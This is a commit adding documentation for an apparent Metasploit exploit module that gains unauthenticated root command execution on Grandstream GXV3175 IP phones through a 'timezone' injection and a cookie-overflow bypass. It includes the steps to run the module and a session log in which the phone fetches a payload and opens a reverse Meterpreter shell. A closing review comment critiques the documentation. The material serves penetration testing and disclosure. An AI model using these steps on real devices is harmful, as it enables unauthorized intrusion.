Add Grandstream GXV3175 'settimezone' Unauthenticated Command Execution

Brendan Coles
2022-01-19 00:04:15 +00:00
parent 1d3a6d51ca
commit ee2feb1207
2 changed files with 161 additions and 0 deletions
@@ -0,0 +1,53 @@
## Vulnerable Application
This module exploits a command injection vulnerability in Grandstream GXV3175
IP multimedia phones. The 'settimezone' action does not validate input in the
'timezone' parameter allowing injection of arbitrary commands.
A buffer overflow in the 'phonecookie' cookie parsing allows authentication
to be bypassed by providing an alphanumeric cookie 93 characters in length.
This module was tested successfully on Grandstream GXV3175v2
hardware revision V2.6A with firmware version 1.0.1.19.
## Verification Steps
1. `msfconsole`
1. `use exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec`
1. `set rhosts [IP]`
1. `set lhost [IP]`
1. `run`
1. You should get a session
## Options
## Scenarios
```
msf6 > use exploit/linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec
[*] Using configured payload linux/armle/meterpreter_reverse_tcp
msf6 exploit(linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec) > set rhosts 10.1.1.109
rhosts => 10.1.1.109
msf6 exploit(linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec) > set lhost 10.1.1.110
lhost => 10.1.1.110
msf6 exploit(linux/http/grandstream_gxv3175_settimezone_unauth_cmd_exec) > run
[*] Started reverse TCP handler on 10.1.1.110:4444
[*] Using URL: http://0.0.0.0:8080/JF62dexHKN8b
[*] Local IP: http://10.1.1.110:8080/JF62dexHKN8b
[*] Client 10.1.1.109 (Wget/1.10.1) requested /JF62dexHKN8b
[*] Sending payload to 10.1.1.109 (Wget/1.10.1)
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Meterpreter session 1 opened (10.1.1.110:4444 -> 10.1.1.109:39371 ) at 2022-01-08 13:27:44 -0500
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 10.1.1.109
OS : (Linux 2.6.32_gxv3170v2)
Architecture : armv7l
BuildTuple : armv5l-linux-musleabi
Meterpreter : armle/linux
meterpreter >
```
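Review bot: the `## Options` section in this hunk is empty; module documentation should either list the options a user is expected to set (at least `RHOSTS` and `LHOST`, which the verification steps rely on, plus any module-specific ones) or say explicitly that the module adds no options beyond the standard ones, so the section does not read as unfinished. Two smaller points on the same hunk: the 'Vulnerable Application' paragraph describes both the 'timezone' command injection and the 'phonecookie' cookie overflow used for the authentication bypass but cites no advisory or identifier for either, so a short reference line would help readers confirm the affected firmware range; and in the session output the line `OS : (Linux 2.6.32_gxv3170v2)` names a gxv3170v2 kernel while the text says the test device was a GXV3175v2 (hardware revision V2.6A, firmware 1.0.1.19), which deserves a one-line remark in the Scenarios section so the mismatch is not taken for a typo in the tested-version statement.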